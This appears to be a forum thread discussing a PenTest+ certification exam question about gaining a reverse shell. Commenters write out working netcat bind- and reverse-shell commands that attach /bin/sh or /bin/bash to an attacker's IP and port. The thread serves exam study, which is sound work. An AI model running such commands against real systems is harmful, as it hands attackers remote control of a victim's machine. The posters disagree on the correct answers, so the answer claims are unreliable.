Exam PT0-001 topic 1 question 30 discussion

The correct answers are C & D. Source: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

The question asks two possible ways to gain a reverse shell back to the attacking machine at 192.168.1.5. So the correct answers would be C and D. You can use either one to gain a reverse shell. B (nc -nlvp 44444 -e /bin/sh) is just a listener from from the remote machine used for a bind shell. Bind Shell - have the listener running on the target and the attacker connect to the listener in order to gain a remote shell. nc -nvlp 5555 -e /bin/bash - setting up a listener from the remote machine nc -nv 192.168.10.10 5555 - use our machine to connect to it remotely Reverse Shell - have the listener running on the attacker and the target connecting to the attacker with a shell. nc -nvlp 5555 - setting up a listener from the attacker machine nc -nv 192.168.20.20 5555 -e /bin/bash - use the target machine to connect to our machine http://stuffjasondoes.com/2018/07/18/bind-shells-and-reverse-shells-with-netcat/ The thing is everywhere I see this question B and C are correct so what we need to do to pass the exam, trust our own instincts/experience or what Comptia believes is correct? Is it worth to pay for the Comptia CertMaster Practice in order to verify all those doubtful questions?

b,d correct

b,c correct

looks good to me

THE ANSWER IS NOT C! A BIND SHELL SETS UP A LISTENER ON THE VICTIM; A REVERSE SHELL HAS THE LISTNER ON THE ATTACK MACHINE! C is not the answer here. The target would be establishing an outbound connection to the attacker and then run /bin/bash once is connects to the listening port on the attacker machine.

C and D are the correct answers

A, B Target Listener nc -lp 5555 - e /bin/sh Attacker nc 192.168.1.1 5555

B, C Ref.: https://www.reddit.com/r/hacking/comments/5ms9gv/help_reverse_shell_exploit/

I think there are 3 correct answers here. B,C & D. B is needed to create a nc listener on the attackers machine. C will work when the -e option is not available on for nc. D work because the -e option is available. More than likely it will be C/D

I also think the correct answers are C and D. According to this site: https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/ This should work: # nc 192.168.1.5 44444 -e /bin/sh Note that D is very similar: nc -e /bin/sh 192.168.1.5 44444 - A is probably wrong because no shell is executed - B is probably wrong because no IP is not specified - E is wrong because there is no 444444 port (too high a port) - F is wrong because the IP is 192.168.5.1 not 192.168.1.5

Wrong...C and D http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet